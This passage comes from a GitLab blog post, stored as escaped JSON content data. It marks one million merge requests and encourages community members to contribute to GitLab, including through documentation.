(May 2019 vs. May 2018). The primary driver of this spike is MRs in private projects on GitLab.com, indicating there is opportunity to increase the wider community's engagement in public projects.\n\n## Everyone can contribute\n\nWe built GitLab so [everyone can contribute](/company/mission/#mission)! We regularly receive MRs from software developers, project managers, and writers (like me!) pertaining to different private and public projects.\n\nGitLab may be a DevOps tool, but these MRs are in no way limited to developer activities. GitLab was designed so contributors can collaborate on projects, taking an idea from the conceptual to the actionable through a series of iterative changes. These 1 million MRs in March 2019 don’t all represent monumental changes to GitLab. Instead, they represent a million different ways the community has contributed to GitLab.\n\n\"Our [ambitious, shared vision](/direction/#vision) to make it easier and faster to innovate with a [single application](/handbook/product/single-application/) is only achievable with the support of the wider community,\" says Jeremy Watson, senior product manager for the Manage team at GitLab. \"We can't do it alone; we're happy to welcome first-time contributors, and [members of the community can help in a variety of ways](/community/contribute/) – even if you're not comfortable with contributing with code.\"\n\n\"We've had about 40-50 new contributors in the past six to seven releases,\" adds Ray Paik, code contributor program manager. \"These are first-time contributors who had their MRs merged.\"\n\nWe see MRs that span highly technical topics, such as executing on our [monitoring product roadmap](/direction/monitor/), to MRs that are more operational, such as making improvements to the GitLab onboarding process. A lot of first-time contributors start by making improvements to our documentation, which doesn't involve writing code at all. There's also [more to contributing than submitting MRs](/blog/how-do-you-contribute/)!\n\nSo whether you spot a typo in the [GitLab handbook](/handbook/), or want to [contribute to our documentation](/community/contribute/), start a conversation with us and open an issue or submit an MR today.\n",[267,9],{"slug":5514,"featured":6,"template":689},"1-mil-merge-requests","content:en-us:blog:1-mil-merge-requests.yml","1 Mil Merge Requests","en-us/blog/1-mil-merge-requests.yml","en-us/blog/1-mil-merge-requests",28,[666,694,715,737,760,787,810,830,852],1753981660859]